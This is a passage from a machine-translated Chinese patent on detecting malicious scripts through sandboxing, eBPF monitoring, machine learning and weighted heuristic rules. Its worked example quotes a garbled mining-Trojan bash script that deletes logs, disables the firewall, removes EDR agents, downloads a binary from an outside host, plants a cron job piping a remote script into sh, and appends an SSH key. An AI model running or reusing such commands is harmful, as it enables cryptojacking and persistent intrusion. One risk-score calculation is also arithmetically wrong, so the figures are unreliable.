In this embodiment, when calculating the similarity between the current behavior sequence and the known threat, the extracted static and dynamic features may be specifically subjected to similarity matching with features in the known malicious sample library, and the similarity of the script may be evaluated by using a hash algorithm (e.g., MD5, SHA-256) or similarity calculation (e.g., jaccard similarity), so as to quantify the matching degree between the script and the known malicious sample.
And 2.3, searching a second malicious operation behavior sequence meeting a malicious time sequence mode according to the time interval of each operation event.
In this embodiment, the sequential logic rule in the malicious sequential pattern is mainly used to analyze the sequence and time interval of occurrence of malicious behaviors, and by analyzing the sequential relationship of the behaviors, the detection accuracy can be further improved.
Specifically, the sequential logic rule is a rule that sets a sequential relationship between critical actions, and when an event conforming to the sequential logic rule is detected, a second sequence of malicious operation actions is generated so as to perform a subsequent analysis process. In determining the timing relationship analysis, the time intervals between the behaviors are calculated using the event timestamps, and if the time intervals between the behaviors meet preset conditions, the time intervals are marked as potential threats, and the time interval threshold is set to be between 1 minute and 10 minutes. When judging whether the time sequence logic rule is met, the time sequence logic of system call, file operation and process tree change can be analyzed, and whether the behavior chain meets the characteristic of typical malicious activity in the time sequence logic rule or not can be judged, for example, the file is downloaded first and then executed, or the security software is closed first and then the file is tampered, and the like.
It should be noted that, after the malicious operation behavior, the first malicious operation behavior sequence and the second malicious operation behavior sequence in the dynamic analysis result are obtained in the present application, a behavior feature aggregation operation may also be executed. The behavior feature aggregation operation is to aggregate all captured malicious behavior events to generate a behavior time line. By analysis of the time line, a key sequence of actions can be identified and further decisions and responses made.
The method comprises the steps of generating a behavior time line, arranging all captured behaviors according to a time sequence, wherein the captured behaviors comprise malicious operation behaviors, malicious operation behaviors in a first malicious operation behavior sequence and a second malicious operation behavior sequence, taking event time stamps corresponding to the malicious operation behaviors as behavior occurrence time, and displaying the occurrence sequence of each behavior through the behavior time line. Of course, specific information of malicious operation behaviors can be displayed in the behavior time line, and the specific information not only comprises time stamps of corresponding events, but also comprises information such as event types, process IDs and the like. The application can analyze the behavior sequence in the behavior time line, and identify the behavior combination with high relevance, for example, when the behavior conforming to the malicious mode appears on the time line for a plurality of times, the system gives an alarm.
For example, the target script is a malicious mining script that first downloads an external executable file, then disables the firewall, and then modifies the timing tasks to run the mining program periodically. The process of detecting malicious operation behavior through the steps is as follows:
And executing an event capturing operation, namely capturing that the script downloads an external file by using wget, and recording a file path and a hash value. Next, the system captures that the script is executing an iptables-F command, disabling the firewall. Finally, the system detects a modification of the timed task file.
And extracting behavior characteristics, namely identifying three malicious operation behaviors of downloading external files, disabling a firewall and modifying a timing task.
The method comprises the following steps of context association analysis, wherein the behavior sequence of external file downloading, firewall disabling and timing task modifying can be judged to be a malicious operation behavior sequence as events in a sliding window are matched with a predefined pattern matching rule of external file downloading, firewall disabling and timing task modifying;
And (3) sequential logic evaluation, namely analyzing the external file downloading, firewall disabling and timing task modifying through a malicious sequential mode, and determining that the behavior sequence also meets the sequential requirement and occurs within a specified time interval, so that the behavior sequence of the external file downloading, firewall disabling and timing task modifying is again determined to be a malicious operation behavior sequence.
In summary, the application utilizes eBPF mechanism to deeply monitor the system, captures the decryption and confusion processes of malicious scripts, monitors the key catalogue, file operation and network communication in real time, and ensures comprehensive behavior monitoring. In the dynamic identification process, the accurate detection of the malicious script is realized through the extraction and analysis of actions such as firewall disabling, log clearing, rebound shell, binary downloading, timed task implantation and the like.
Referring to fig. 3, fig. 3 is a flowchart of another method for detecting a malicious script according to an embodiment of the present application, where the method includes the following steps:
s301, acquiring a target script to be analyzed;
s302, performing text analysis on the target script to generate a static analysis result;
s303, running a target script through a sandbox container, acquiring an operation event of the target script in the running process, and generating a dynamic analysis result according to the operation event;
s304, extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting the feature vectors into a machine learning model to obtain a first risk assessment result;
s305, determining high-risk behavior rules and suspicious behavior combination rules in the heuristic rule set;
S306, detecting a high-risk behavior rule matched with the malicious operation behavior, and determining a first matching score according to the weight score of the matched high-risk behavior rule;
s307, detecting suspicious behavior combination rules matched with the first malicious operation behavior sequence and the second malicious operation behavior sequence, and determining a second matching score according to the weight scores of the matched suspicious behavior combination rules;
S308, determining a total matching score according to the first matching score and the second matching score;
S309, obtaining a malicious probability score in the first risk assessment result and obtaining a total matching score in the second risk assessment result;
S310, calculating a comprehensive risk score by using the malicious probability score, the total matching score, the first weight coefficient of the malicious probability score and the second weight coefficient of the total matching score;
And S311, determining the risk assessment grade of the target script according to the comprehensive score.
In this embodiment, the combination of high-risk behavior and suspicious behavior can be matched from dynamic analysis results through a heuristic rule set. Some high-risk behaviors are defined in the high-risk behavior rules, such as deleting system logs and disabling security software. And for each rule, a corresponding weight score is also set, for example, the weight score of the deleted system log is 0.8, and the weight score of the forbidden security software is 0.7. And if a plurality of high-risk behaviors are matched from the dynamic analysis result, taking the sum of the weight scores of the plurality of high-risk behaviors as a first matching score.
The suspicious behavior combination rule defines a combination of a plurality of behaviors with potential threats, for example, the rule defines a combination of 'download execution + timing task modification + network connection' to be suspicious behaviors. And the weight score of each behavior is defined in the rule, for example, the weight score of an external file is downloaded and executed to be 0.5, the weight score of a timing task modification is 0.4, the weight score of a network connection to an external IP is 0.6, and if the suspicious behavior combination rule is matched in a malicious operation behavior sequence, the obtained second matching score is 1.5. The total matching score in this embodiment is the sum of the first matching score and the second matching score. Further, if the first risk assessment result is a malicious probability score obtained through the machine learning model, the comprehensive risk score may be calculated according to the malicious probability score, the total matching score, the first weight coefficient of the malicious probability score, and the second weight coefficient of the total matching score. And when the comprehensive risk is calculated, if the total matching score is too high, a full score coefficient of the total matching score can be set for carrying out normalization processing on the total matching score, so that all scores are ensured to be between 0 and 1.
For example, the target script is a malicious mining script, and the target script performs the following actions when running, namely downloading an external file and executing the file, modifying timing tasks, ensuring that malicious programs run regularly, and disabling the firewall of the system.
In this embodiment, when the first risk assessment result is obtained through the random forest model, the behavior feature is extracted and expressed as a 500-dimensional vector, the random forest model classifies the feature vector, and the probability score of malicious intent is output to be 0.75. When the behaviors are matched through the heuristic rule set, the rule of downloading and executing an external file is found to be matched by the malicious mining script, the score is 0.5, and the rule of modifying the timing task is matched, and the score is 0.4. The "firewall disabled" rule is matched, scoring 0.7, so the total match score is 0.5+0.4+0.7=1.6. If the first weight coefficient of the malicious probability score is set to be 0.4, the second weight coefficient of the total matching score is set to be 0.6, and the full score coefficient of the total matching score is set to be 2, the calculated comprehensive risk score is 0.4×0.75+0.6×1.6/2=1.1.
If the preset risk assessment grade standard is that the risk is low, the risk is 0-0.3, the risk is 0.3-0.7, the risk is high, the risk is 0.7-1.5, and the final score of the calculation result is 1.1, so that the risk assessment grade is high.
Further, in this embodiment, after determining the comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result, a risk assessment report may also be generated according to the basic information, the static analysis result, the dynamic analysis result, and the comprehensive risk assessment result of the target script.
Specifically, before generating a risk assessment report, data aggregation is needed, results of all analysis stages are collected, static analysis results and dynamic analysis results are integrated to generate a behavior abstract and key discovery, and then a predefined JSON template structure is used to fill data of each part, wherein the data mainly comprises basic information of a target script including file hash, analysis time and the like of the target script, and static analysis results, dynamic behavior analysis, risk assessment results, detailed behavior timelines and the like. Moreover, the present embodiment can also generate a behavior pattern using the d3.js library and create a time-series chart using plotly.js. After the risk assessment report is generated, the complete report can be saved to a distributed storage system, such as MinIO, a report summary can be generated and pushed to the subscriber through a message queue, wherein the message queue can be RabbitMQ.
Here, the present embodiment provides a complete embodiment of detecting malicious scripts:
1. task receiving, namely receiving a flash script file, wherein in the embodiment, a mining Trojan horse script is taken as an example for explanation:
TOML
#!/bin/bash
rm-rf/var/log/syslog# purge log
Ufw disable # shutdown firewall
Userdel vfinder # unloading EDR
USB/local/qcloud/YunJing/uninst. Sh# offload EDR
Wget/salt-store http://416419.Selcdn. Ru/cdn/salt_ storer # download binary
echo"*****$LDR http://217.8.117.`37/c.sh|sh>dev/null 2&1"
Implant timing task
cat"$SSH_KEY_FILE">>~/.ssh/authorized_keys
Wherein the task priority is set to "high" and the timeout time is set to 10 minutes.
2. Pretreatment:
Generating task ID f3a24d8b-7d1c-4e5a-9f8e-7f1e6b3a5c4d
Computing file SHA256 hash:
8f4e7d1c9b3a2f1e6b5a8c7d9f1e3b5a8c7d9f1e3b5a8c7d9f1e3b5a
file type identification ASCII text executable
3. Preparing a sandbox:
creation of Docker container based on Alpine Linux
Setting the container hostname to "srv-prod-01" and the IP address to "192.168.1.100"
Deploying eBPF probes, and setting monitoring points
4. Script execution and monitoring:
4.1 static analysis finds that the script contains a base64 encoded paragraph
4.2, Executing a script by using a flash interpreter, and capturing the following key actions in real time by eBPF:
a. Delete/var/log/syslog file b. Execute ufw command, attempt to disable firewall c. Delete user d. Execute script named "uninst. Sh" at/usr/local/qcloud/YunJing/directory e. Download file using wget, URL is http://416419.Selcdn. Ru/cdn/salt_ storer f. Modify crontab, add new timing task g. Append content to
5. Behavioral analysis and risk assessment:
5.1 extracting behavior characteristics including log deletion, firewall disabling attempts, user deletion, suspicious software uninstallation, external file download, timed task modification, SSH key operation
5.2, Applying a machine learning model, namely inputting the extracted 500-dimensional feature vector, and outputting a malicious probability score of 0.92 by the model;
5.3, rule matching:
triggering a log deletion rule, wherein the score is 10, the score is 8, and the score is 15;
5.3, comprehensive risk score calculation 0.4 x 0.92+0.6 x (33/40) =0.368+0.495=0.863;
6. reporting the results:
Generating a detailed report in a JSON format, wherein the detailed report comprises all analysis results;
risk assessment conclusion high risk (score 0.863);
a possible malicious intention is that the cryptocurrency digs into the mine, persists infection and avoids detection;
the operation is suggested, namely, an infected system is isolated immediately, malicious components are removed, and the safety protection of the system is enhanced.
In summary, it can be seen that after the isolated operation environment is created, the scenario which may be malicious can be operated in the environment, and the behavior of the scenario can be monitored and recorded during the operation process of the scenario. In the dynamic analysis process, the accuracy and the effectiveness of detection are improved by identifying and extracting actions such as firewall disabling, log clearing, rebound shell, binary downloading, timed task implantation and the like and carrying out hierarchical alarm by combining a multi-feature decision mechanism. In this way, even unprecedented new malicious scripts can be effectively discovered. The scheme adopts the Docker container to run the script, can realize the lightweight design of the system, make the whole detection process faster, occupy the small system resource. The scheme also adopts a cloud native architecture design, supports clustered deployment, can dynamically expand analysis capability according to requirements, and improves expandability and flexibility of the system.
Referring to fig. 4, fig. 4 is a schematic structural diagram of a detection apparatus for malicious scripts according to an embodiment of the present application, where the apparatus specifically includes:
A first obtaining module 11, configured to obtain a target script to be analyzed;
the first analysis module 12 is used for performing text analysis on the target script and generating a static analysis result;
the second obtaining module 13 is configured to operate the target script through a sandbox container, and obtain an operation event of the target script in an operation process;
a second analysis module 14 for generating a dynamic analysis result according to the operation event;
The first evaluation module 15 is configured to extract a feature vector from the static analysis result and the dynamic analysis result, and input a machine learning model to obtain a first risk evaluation result;
a second evaluation module 16, configured to determine a second risk evaluation result by matching the operation behaviors in the dynamic analysis result through a heuristic rule set;
The result determining module 17 is configured to determine a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
As an optional embodiment, the first analysis module is specifically configured to perform text analysis on the target script, identify target code segments in the target script, and record code information and a position of each target code segment, where a type of the target code segment includes at least one of a confusion code segment, an encryption code segment, a command, a function, a character string, and a constant.
As an alternative embodiment, the second analysis module comprises:
the identification unit is used for identifying malicious operation behaviors in the operation event;
The first searching unit is used for matching the operation event sequence in the sliding window with the malicious behavior pattern and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold value;
The second searching unit is used for searching a second malicious operation behavior sequence meeting the malicious time sequence mode according to the time interval of each operation event.
As an alternative embodiment, the second evaluation module comprises:
the first determining unit is used for determining high-risk behavior rules and suspicious behavior combination rules in the heuristic rule set;
the first detection unit is used for detecting a high-risk behavior rule matched with the malicious operation behavior and determining a first matching score according to the weight score of the matched high-risk behavior rule;
The second detection unit is used for detecting suspicious behavior combination rules matched with the first malicious operation behavior sequence and the second malicious operation behavior sequence, and determining a second matching score according to the weight scores of the matched suspicious behavior combination rules;
and the second determining unit is used for determining a total matching score according to the first matching score and the second matching score.
The second obtaining module is specifically configured to obtain, by using a eBPF mechanism of the sandbox container, an operation event of the target script in a running process, where the operation event includes a system call event, a network activity event, a file operation event, and a process management event.
As an alternative embodiment, the result determination module includes:
the acquisition unit is used for acquiring the malicious probability score in the first risk assessment result and acquiring the total matching score in the second risk assessment result;
the computing unit is used for computing a comprehensive risk score by using the malicious probability score, the total matching score, a first weight coefficient of the malicious probability score and a second weight coefficient of the total matching score;
and a third determining unit, configured to determine a risk assessment level of the target script according to the comprehensive score.
As an alternative embodiment, the device further comprises:
And the report generation module is used for generating a risk assessment report according to the basic information of the target script, the static analysis result, the dynamic analysis result and the comprehensive risk assessment result.
The specific manner in which the various modules perform the operations in the apparatus of the above embodiments have been described in detail in connection with the embodiments of the method, and will not be described in detail herein.
Referring to fig. 5, fig. 5 is a schematic structural diagram of an electronic device according to an embodiment of the present application, where the electronic device specifically includes:
The processor 21, the memory 22 and the computer program stored in the memory 22 and capable of running on the processor 21, the processor 21 executes the steps of the method for detecting a malicious script according to any of the above method embodiments through the computer program.
Processor 21 may include one or more processing cores, such as a 4-core processor, an 8-core processor, etc. The processor 21 may be implemented as at least one of hardware form of DSP (DIGITAL SIGNAL Processing), FPGA (Field-Programmable gate array), PLA (Programmable Logic Array ). The processor 21 may also include a main processor, which is a processor for processing data in a wake-up state, also called a CPU (Central Processing Unit ), and a coprocessor, which is a low-power processor for processing data in a standby state. In some embodiments, the processor 21 may integrate a GPU (Graphics Processing Unit, image processor) for rendering and drawing of content required to be displayed by the display screen. In some embodiments, the processor 21 may also include an AI (ARTIFICIAL INTELLIGENCE ) processor for processing computing operations related to machine learning.
Memory 22 may include one or more computer-readable storage media, which may be non-transitory. Memory 22 may also include high-speed random access memory, as well as non-volatile memory, such as one or more magnetic disk storage devices, flash memory storage devices. In this embodiment, the memory 22 is at least used for storing a computer program 221, where the computer program, after being loaded and executed by the processor 21, can implement relevant steps in the method for detecting a malicious script disclosed in any of the foregoing embodiments. In addition, the resources stored in the memory 22 may further include an operating system 222, data 223, and the like, where the storage mode may be transient storage or permanent storage. Operating system 222 may include Windows, unix, linux, among other things.
In some embodiments, the electronic device may further include a display 23, an input-output interface 24, a communication interface 25, a sensor 26, a power supply 27, and a communication bus 28.
Of course, the structure of the electronic device shown in fig. 5 is not limited to the electronic device in the embodiment of the present application, and the electronic device may include more or fewer components than those shown in fig. 5 or may combine some components in practical applications.
In another exemplary embodiment, there is also provided a computer storage medium, which when executed by a processor, implements the steps of the method for detecting a malicious script according to any one of the method embodiments described above.
The storage medium may include a usb disk, a removable hard disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk, etc. that may store the program code.
Alternatively, specific examples in this embodiment may refer to examples described in the foregoing embodiments, and this embodiment is not described herein.
It is to be understood that the terminology used herein is for the purpose of describing particular example embodiments only, and is not intended to be limiting. As used herein, the singular forms "a", "an" and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. The terms "comprises," "comprising," "includes," "including," and "having" are inclusive and therefore specify the presence of stated features, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, steps, operations, elements, components, and/or groups thereof. The method steps, processes, and operations described herein are not to be construed as necessarily requiring their performance in the particular order described or illustrated, unless an order of performance is explicitly stated. It should also be appreciated that additional or alternative steps may be used.
The foregoing is only a specific embodiment of the invention to enable those skilled in the art to understand or practice the invention. Various modifications to these embodiments will be readily apparent to those skilled in the art, and the generic principles defined herein may be applied to other embodiments without departing from the spirit or scope of the invention. Thus, the present invention is not intended to be limited to the embodiments shown herein but is to be accorded the widest scope consistent with the principles and novel features disclosed herein.

Claims (10)

1. The method for detecting the malicious script is characterized by comprising the following steps:
Acquiring a target script to be analyzed;
performing text analysis on the target script to generate a static analysis result;
operating the target script through a sandbox container, acquiring an operation event of the target script in the operation process, and generating a dynamic analysis result according to the operation event;
Extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk assessment result;
Matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
and determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
2. The method of claim 1, wherein performing text analysis on the target script to generate a static analysis result comprises:
Performing text analysis on the target script, identifying target code segments in the target script, and recording code information and positions of each target code segment;
The object code segment comprises at least one of a confusion code segment, an encryption code segment, a command, a function, a character string and a constant.
3. The method of claim 1, wherein generating dynamic analysis results from the operational events comprises:
identifying malicious operation behaviors in the operation event;
matching the operation event sequence in the sliding window with a malicious behavior pattern, and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold;
and searching a second malicious operation behavior sequence meeting the malicious time sequence mode according to the time interval of each operation event.
4. The method of claim 3, wherein the matching the operational behavior in the dynamic analysis result by the heuristic rule set, determining a second risk assessment result comprises:
Determining high-risk behavior rules and suspicious behavior combination rules in the heuristic rule set;
Detecting a high-risk behavior rule matched with the malicious operation behavior, and determining a first matching score according to the weight score of the matched high-risk behavior rule;
detecting suspicious behavior combination rules matched with the first malicious operation behavior sequence and the second malicious operation behavior sequence, and determining a second matching score according to the weight scores of the matched suspicious behavior combination rules;
and determining a total matching score according to the first matching score and the second matching score.
5. The method according to claim 1, wherein the obtaining the operation event of the target script in the running process includes:
And acquiring operation events of the target script in the running process through a eBPF mechanism of the sandbox container, wherein the operation events comprise a system call event, a network activity event, a file operation event and a process management event.
6. The method according to any one of claims 1 to 5, wherein the determining a comprehensive risk assessment result from the first risk assessment result and the second risk assessment result includes:
Obtaining a malicious probability score in the first risk assessment result and obtaining a total matching score in the second risk assessment result;
calculating a comprehensive risk score by using the malicious probability score, the total matching score, a first weight coefficient of the malicious probability score and a second weight coefficient of the total matching score;
and determining the risk assessment grade of the target script according to the comprehensive score.
7. The method according to claim 6, wherein after determining a comprehensive risk assessment result from the first risk assessment result and the second risk assessment result, further comprising:
and generating a risk assessment report according to the basic information of the target script, the static analysis result, the dynamic analysis result and the comprehensive risk assessment result.
8. A malicious script detection device, comprising:
The first acquisition module is used for acquiring a target script to be analyzed;
the first analysis module is used for carrying out text analysis on the target script and generating a static analysis result;
The second acquisition module is used for operating the target script through the sandbox container and acquiring an operation event of the target script in the operation process;
the second analysis module is used for generating a dynamic analysis result according to the operation event;
the first evaluation module is used for extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk evaluation result;
the second evaluation module is used for matching the operation behaviors in the dynamic analysis results through a heuristic rule set to determine a second risk evaluation result;
and the result determining module is used for determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
9. An electronic device, comprising:
A processor, a memory and a computer program stored on the memory and executable on the processor, the processor executing the steps of the method for detecting a malicious script according to any one of the preceding claims 1 to 7 by means of the computer program.
10. A computer storage medium storing computer executable instructions for performing the steps of the method for detecting a malicious script according to any one of the preceding claims 1 to 7.
CN202411486314.7A 2024-10-23 2024-10-23 Malicious script detection method, device, equipment and storage medium Pending CN119397533A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202411486314.7A CN119397533A (en) 2024-10-23 2024-10-23 Malicious script detection method, device, equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202411486314.7A CN119397533A (en) 2024-10-23 2024-10-23 Malicious script detection method, device, equipment and storage medium

Publications (1)

Publication Number Publication Date
CN119397533A true CN119397533A (en) 2025-02-07

Family

ID=94418613

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202411486314.7A Pending CN119397533A (en) 2024-10-23 2024-10-23 Malicious script detection method, device, equipment and storage medium

Country Status (1)

Country Link
CN (1) CN119397533A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN119720205A (en) * 2025-03-04 2025-03-28 军工保密资格审查认证中心 Malicious script identification method and device, computer equipment and readable storage medium
CN119783103A (en) * 2025-03-11 2025-04-08 杭州海康威视数字技术股份有限公司 Real-time detection method, device, equipment and medium for malicious behavior in smart terminal kernel
CN119854046A (en) * 2025-03-20 2025-04-18 华信咨询设计研究院有限公司 Session key capturing and security event analyzing method, device, equipment and medium

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN119720205A (en) * 2025-03-04 2025-03-28 军工保密资格审查认证中心 Malicious script identification method and device, computer equipment and readable storage medium
CN119783103A (en) * 2025-03-11 2025-04-08 杭州海康威视数字技术股份有限公司 Real-time detection method, device, equipment and medium for malicious behavior in smart terminal kernel
CN119854046A (en) * 2025-03-20 2025-04-18 华信咨询设计研究院有限公司 Session key capturing and security event analyzing method, device, equipment and medium

Similar Documents

Publication Publication Date Title
US11423146B2 (en) Provenance-based threat detection tools and stealthy malware detection
JP7531816B2 (en) Image-based malicious code detection method and device and artificial intelligence-based endpoint threat detection and response system using the same
US11882134B2 (en) Stateful rule generation for behavior based threat detection
CN111931166B (en) Application anti-attack method and system based on code injection and behavior analysis
US10581879B1 (en) Enhanced malware detection for generated objects
CN110826064B (en) A method, device, electronic device and storage medium for processing malicious files
US10193906B2 (en) Method and system for detecting and remediating polymorphic attacks across an enterprise
US20230252136A1 (en) Apparatus for processing cyber threat information, method for processing cyber threat information, and medium for storing a program processing cyber threat information
CN119397533A (en) Malicious script detection method, device, equipment and storage medium
CN112134897B (en) Network attack data processing method and device
Chandramohan et al. A scalable approach for malware detection through bounded feature space behavior modeling
US20240054210A1 (en) Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program
CN114090406A (en) Electric power Internet of things equipment behavior safety detection method, system, equipment and storage medium
US20230252144A1 (en) Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program
US20240054215A1 (en) Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program
Eskandari et al. To incorporate sequential dynamic features in malware detection engines
US20230048076A1 (en) Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program
CN118839721A (en) Detection model training method, code detection device and related equipment
WO2023072002A1 (en) Security detection method and apparatus for open source component package
CN115904605A (en) Software defense method and related equipment
Singh et al. Unveiling the veiled: An early stage detection of fileless malware
CN117150488A (en) Ground-leaving attack detection method and system based on time sequence analysis and memory evidence obtaining
Rosli et al. Ransomware behavior attack construction via graph theory approach
CN119603031B (en) Network malicious attack monitoring method and system based on deep neural model
US12368731B2 (en) Cyber threat information processing apparatus, cyber threat information processing method, and storage medium storing cyber threat information processing program

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
CB02 Change of applicant information
CB02 Change of applicant information

Country or region after: China

Address after: 100080 Room 108, 1st Floor, No. 52 West Beisihuan Road, Haidian District, Beijing

Applicant after: BEIJING QIYI CENTURY SCIENCE & TECHNOLOGY Co.,Ltd.

Address before: 100080 No. 2, North First Street, Haidian District, Beijing, 10th and 11th floors

Applicant before: BEIJING QIYI CENTURY SCIENCE & TECHNOLOGY Co.,Ltd.

Country or region before: China